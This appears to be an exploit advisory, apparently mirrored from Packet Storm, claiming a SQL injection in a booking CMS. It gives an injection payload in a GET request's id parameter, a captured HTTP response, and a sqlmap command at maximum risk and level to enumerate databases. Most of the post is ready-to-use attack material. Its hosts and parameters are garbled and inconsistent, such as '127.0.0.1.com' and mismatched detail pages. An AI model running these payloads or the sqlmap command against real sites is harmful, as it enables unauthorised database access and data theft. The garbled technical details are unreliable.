Share
## https://sploitus.com/exploit?id=PACKETSTORM:223790
==================================================================================================================================
| # Title : CMS academy booking v1.0 sql injection vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : https://www.cookwithping.com/Home/test.php |
==================================================================================================================================
[+] Summary : CMS academy booking v1.0 suffer from sql injection vulnerability.
[+] Payload :
GET /Home/index.php?home=news-detail&id=29%20AND%203*2*1%3d6%20AND%20593%3d593 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://www.127.0.01.com/Home/index.php?home=treatment-detail&treatment_id=29
Cookie: PHPSESSID=4k9krjvjjhmcdjh99qsd4pce4d
Host: www.127.0.0.1.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 14 Jun 2026 13:32:02 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 17160
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Original-Content-Encoding: gzip
[+] POC : E:\sqlmap>python sqlmap.py -u "https://www.127.0.0.1.com/Home/index.php?home=treatment-detail&treatment_id=29" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================